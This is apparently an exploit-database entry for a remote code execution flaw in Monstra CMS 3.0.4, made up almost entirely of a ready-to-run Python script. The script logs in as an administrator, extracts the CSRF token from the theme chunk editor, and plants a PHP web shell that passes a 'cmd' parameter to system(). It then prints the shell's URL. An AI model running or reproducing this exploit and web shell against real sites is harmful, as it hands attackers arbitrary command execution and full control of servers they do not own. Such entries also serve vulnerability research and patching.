Monstra CMS version 3.0.4 suffers from a remote code execution vulnerability. Original discovery of code execution in this version is attributed to Ishaq Mohammed in December of 2017.
# Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (RCE)
# Date: 05.05.2024
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://monstra.org/
# Software Link: https://monstra.org/monstra-3.0.4.zip
# Version: 3.0.4
# Tested on: MacOS
import requests
import random
import string
import time
import re
import sys
if len(sys.argv) < 4:
print("Usage: python3 script.py <url> <username> <password>")
sys.exit(1)
base_url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
session = requests.Session()
login_url = f'{base_url}/admin/index.php?id=dashboard'
login_data = {
'login': username,
'password': password,
'login_submit': 'Log+In'
}
filename = ''.join(random.choices(string.ascii_lowercase + string.digits, k=
5))
print("Logging in...")
response = session.post(login_url, data=login_data)
if 'Dashboard' in response.text:
print("Login successful")
else:
print("Login failed")
exit()
time.sleep(3)
edit_url = f'{base_url}/admin/index.php?id=themes&action=add_chunk'
response = session.get(edit_url) # CSRF token bulmak için edit sayfasına
erişim
token_search = re.search(r'input type="hidden" id="csrf" name="csrf" value="
(.*?)"', response.text)
if token_search:
token = token_search.group(1)
else:
print("CSRF token could not be found.")
exit()
content = '''
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>
'''
edit_data = {
'csrf': token,
'name': filename,
'content': content,
'add_file': 'Save'
}
print("Preparing shell...")
response = session.post(edit_url, data=edit_data)
time.sleep(3)
if response.status_code == 200:
print(f"Your shell is ready: {base_url}/public/themes/default/{filename}
.chunk.php")
else:
print("Failed to prepare shell.")